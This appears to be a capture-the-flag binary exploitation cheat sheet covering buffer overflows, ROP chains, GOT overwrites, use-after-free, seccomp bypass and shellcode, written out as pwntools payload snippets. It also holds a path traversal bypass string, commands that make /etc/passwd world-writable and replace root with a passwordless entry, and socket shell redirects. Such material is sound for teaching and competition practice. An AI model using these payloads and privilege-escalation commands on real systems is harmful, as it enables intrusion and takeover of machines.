CTF Binary Exploitation (Pwn)

Additional Resources

• format-string.md - Format string exploitation (leaks, GOT overwrite, blind pwn, filter bypass)
• advanced.md - Advanced techniques (heap, JIT, esoteric GOT, custom allocators, DNS overflow)

Source Code Red Flags

• Threading/

  pthread

  → race conditions

• usleep()

  /

  sleep()

  → timing windows
• Global variables in multiple threads → TOCTOU

Race Condition Exploitation

bash -c '{ echo "cmd1"; echo "cmd2"; sleep 1; } | nc host port'

Common Vulnerabilities

• Buffer overflow:

  gets()

  ,

  scanf("%s")

  ,

  strcpy()

• Format string:

  printf(user_input)

• Integer overflow, UAF, race conditions

Kernel Exploitation

• Look for vulnerable

  lseek

  handlers allowing OOB read/write
• Heap grooming with forked processes
• SUID binary exploitation via kernel-to-userland buffer overflow
• Check kernel config for disabled protections:

  • CONFIG_SLAB_FREELIST_RANDOM=n

    → sequential heap chunks

  • CONFIG_SLAB_MERGE_DEFAULT=n

    → predictable allocations

FUSE/CUSE Character Device Exploitation

• Look for

  cuse_lowlevel_main()

  or

  fuse_main()

  calls
• Device operations struct with

  open

  ,

  read

  ,

  write

  handlers
• Device name registered via

  DEVNAME=backdoor

  or similar

// Backdoor pattern: write handler with command parsing
void backdoor_write(const char *input, size_t len) {
    char *cmd = strtok(input, ":");
    char *file = strtok(NULL, ":");
    char *mode = strtok(NULL, ":");
    if (!strcmp(cmd, "b4ckd00r")) {
        chmod(file, atoi(mode));  // Arbitrary chmod!
    }
}

# Change /etc/passwd permissions via custom device
echo "b4ckd00r:/etc/passwd:511" > /dev/backdoor

# 511 decimal = 0777 octal (rwx for all)
# Now modify passwd to get root
echo "root::0:0:root:/root:/bin/sh" > /etc/passwd
su root

1. Make

   /etc/passwd

   writable via the backdoor
2. Replace root line with

   root::0:0:root:/root:/bin/sh

   (no password)

3. su root

   without password prompt

Busybox/Restricted Shell Escalation

1. Find writable paths via character devices
2. Target system files:

   /etc/passwd

   ,

   /etc/shadow

   ,

   /etc/sudoers

3. Modify permissions then content to gain root

Protection Implications for Exploit Strategy

• Partial RELRO + No PIE → GOT overwrite (easiest, use fixed addresses)
• Full RELRO → target

  __free_hook

  ,

  __malloc_hook

  (glibc < 2.34), or return addresses
• Stack canary present → prefer heap-based attacks or leak canary first

Stack Buffer Overflow

1. Find offset to return address:

   cyclic 200

   then

   cyclic -l <value>

2. Check protections:

   checksec --file=binary

3. No PIE + No canary = direct ROP
4. Canary leak via format string or partial overwrite

ret2win with Parameter (Magic Value Check)

// Common pattern in disassembly
void win(long arg) {
    if (arg == 0x1337c0decafebeef) {  // Magic check
        // Open and print flag
    }
}

from pwn import *

# Find gadgets
pop_rdi_ret = 0x40150b   # pop rdi; ret
ret = 0x40101a           # ret (for stack alignment)
win_func = 0x4013ac
magic = 0x1337c0decafebeef

offset = 112 + 8  # = 120 bytes to reach return address

payload = b"A" * offset
payload += p64(ret)        # Stack alignment (Ubuntu/glibc requires 16-byte)
payload += p64(pop_rdi_ret)
payload += p64(magic)
payload += p64(win_func)

• Search for

  fopen("flag.txt")

  or similar in Ghidra
• Look for functions with no XREF that check a magic parameter
• Check for conditional print/exit patterns after parameter comparison

Stack Alignment (16-byte Requirement)

call

• SIGSEGV in

  movaps

  instruction (SSE requires alignment)
• Crash inside libc functions (printf, system, etc.)

ret

payload = b"A" * offset
payload += p64(ret)        # Align stack to 16 bytes
payload += p64(pop_rdi_ret)
# ... rest of chain

Offset Calculation from Disassembly

push   %rbp
mov    %rsp,%rbp
sub    $0x70,%rsp        ; Stack frame = 0x70 (112) bytes
...
lea    -0x70(%rbp),%rax  ; Buffer at rbp-0x70
mov    $0xf0,%edx        ; read() size = 240 (overflow!)

• Buffer starts at

  rbp - buffer_offset

  (e.g., rbp-0x70)
• Saved RBP is at

  rbp

  (0 offset from buffer end)
• Return address is at

  rbp + 8

• Total offset = buffer_offset + 8 = 112 + 8 = 120 bytes

Input Filtering (memmem checks)

memmem()

payload = b"A" * 120 + p64(gadget) + p64(value)
assert b"badge" not in payload and b"token" not in payload

Finding Gadgets

# Find pop rdi; ret
objdump -d binary | grep -B1 "pop.*rdi"
ROPgadget --binary binary | grep "pop rdi"

# Find simple ret (for alignment)
objdump -d binary | grep -E "^\s+[0-9a-f]+:\s+c3\s+ret"

Struct Pointer Overwrite (Heap Menu Challenges)

struct Student {
    char name[36];      // offset 0x00 - data buffer
    int *grade_ptr;     // offset 0x24 - pointer to separate allocation
    float gpa;          // offset 0x28
};  // total: 0x2c (44 bytes)

from pwn import *

WIN = 0x08049316
GOT_TARGET = 0x0804c00c  # printf@GOT

# 1. Create object (allocates struct + sub-allocations)
create_student("AAAA", 5, 3.5)

# 2. Modify name - overflow into pointer field with GOT address
payload = b'A' * 36 + p32(GOT_TARGET)  # 36 bytes padding + GOT addr
modify_name(0, payload)

# 3. Modify grade - scanf("%d", corrupted_ptr) writes to GOT
modify_grade(0, str(WIN))  # Writes win addr as int to GOT entry

# 4. Trigger overwritten function -> jumps to win

• Identify which libc functions the

  win

  function calls internally
• Do NOT overwrite GOT entries for functions used by

  win

  (causes infinite recursion/crash)
• Prefer functions called in the main loop AFTER the write

ROP Chain Building

from pwn import *

elf = ELF('./binary')
libc = ELF('./libc.so.6')
rop = ROP(elf)

# Common gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],
    elf.plt['puts'],
    elf.symbols['main']
)

Pwntools Template

from pwn import *

context.binary = elf = ELF('./binary')
context.log_level = 'debug'

def conn():
    if args.REMOTE:
        return remote('host', port)
    return process('./binary')

io = conn()
# exploit here
io.interactive()

Useful Commands

one_gadget libc.so.6           # Find one-shot gadgets
ropper -f binary               # Find ROP gadgets
ROPgadget --binary binary      # Alternative gadget finder
seccomp-tools dump ./binary    # Check seccomp rules

Use-After-Free (UAF) Exploitation

free()

1. Create object A (allocates chunk with function pointer)
2. Leak address via inspect/view (bypass PIE)
3. Free object A (creates dangling pointer)
4. Allocate object B of same size (reuses freed chunk via tcache)
5. Object B data overwrites A's function pointer with

   win()

   address
6. Trigger A's callback → jumps to

   win()

# UAP Watch pattern
create_report("sighting-0")  # 64-byte struct with callback ptr at +56
leak = inspect_report(0)      # Leak callback address for PIE bypass
pie_base = leak - redaction_offset
win_addr = pie_base + win_offset

delete_report(0)              # Free chunk, dangling pointer remains
# Allocate same-size struct, overwriting callback
create_signal(b"A"*56 + p64(win_addr))
analyze_report(0)             # Calls dangling pointer → win()

Seccomp Bypass

open()

read()

• openat()

  (257),

  openat2()

  (437, often missed!),

  sendfile()

  (40),

  readv()

  /

  writev()

seccomp-tools dump ./binary

scmp_arg_cmp

Stack Shellcode with Input Reversal

1. Leak address via info-leak command (bypass PIE)
2. Find

   sub rsp, 0x10; jmp *%rsp

   gadget
3. Pre-reverse shellcode and RIP overwrite bytes
4. Use partial 6-byte RIP overwrite (avoids null bytes from canonical addresses)
5. Place trampoline (

   jmp short

   ) to hop back into NOP sled + shellcode

scanf("%s")

• Can't embed

  \x00

  in payload
• Use partial pointer overwrite (6 bytes) — top 2 bytes match since same mapping
• Use short jumps and NOP sleds instead of multi-address ROP chains

Path Traversal Sanitizer Bypass

# Sanitizer removes '.' and '/' but skips next char after match
# ../../etc/passwd → bypass with doubled chars:
"....//....//etc//passwd"
# Each '..' becomes '....' (first '.' caught, second skipped, third caught, fourth survives)

/proc/self/fd/N

• If binary opens flag file but doesn't close fd, read via

  /proc/self/fd/3

• fd 0=stdin, 1=stdout, 2=stderr, 3=first opened file

Global Buffer Overflow (CSV Injection)

1. Identify global array adjacent to filename pointer in memory
2. Overflow array bounds by injecting extra delimiters (commas in CSV)
3. Overflowed pointer lands on filename variable
4. Change filename to

   flag.txt

   , then trigger read operation

# Edit last cell with comma-separated overflow
edit_cell("J10", "whatever,flag.txt")
save()   # CSV row now has 11 columns
load()   # Column 11 overwrites savefile pointer with ptr to "flag.txt"
load()   # Now reads flag.txt into spreadsheet
print_spreadsheet()  # Shows flag

Shell Tricks

# Redirect stdin/stdout to client socket (fd 3 common for network)
exec <&3; sh >&3 2>&3

# Or as single command string
exec<&3;sh>&3

• Network servers often have client connection on fd 3
• Avoids firewall issues with outbound connections
• Works when you have command exec but limited chars

ls -la /proc/self/fd           # List open file descriptors

• sh<&3 >&3

  - minimal shell redirect
• Use

  $0

  instead of

  sh

  in some shells